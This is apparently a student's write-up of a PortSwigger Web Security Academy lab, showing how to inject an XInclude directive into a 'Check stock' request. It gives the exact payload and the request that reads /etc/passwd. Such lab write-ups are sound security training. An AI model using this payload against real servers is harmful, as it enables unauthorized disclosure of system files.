Lab: Exploiting XInclude to retrieve files
tags: Portswigger Web Security Academy Web
- Description: This lab has a “Check stock” feature that embeds the user input inside a server-side XML document that is subsequently parsed. Because you don’t control the entire XML document you can’t define a DTD to launch a classic XXE attack.
- Goal: To solve the lab, inject an
XIncludestatement to retrieve the contents of the /etc/passwd file. - Hint: By default,
XIncludewill try to parse the included document as XML. Since /etc/passwd isn’t valid XML, you will need to add an extra attribute to theXIncludedirective to change this behavior.
Background
XInclude is a part of the XML specification that allows an XML document to be built from sub documents You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server side XML document
To perform an XInclude attack you need to reference the XInclude namespace and provide the path to the file that you wish to include
For example:
<foo xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include parse="text" href="file:///etc/passwd"/></foo>
xinclude可以理解為xml include熟悉編譯腳本語言的一定熟知,像php的include,python和java的import都是可以進行檔案包含的。
Recon
In this lab, the package did not contain the xml format data so I can’t control DTD to launch a classic XXE.
Therefore, we can use xinclude?
Exp
Just use the payload at background section and replace productID’s data to exploited payload.
$\to$
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1
:::spoiler Success Screenshot
:::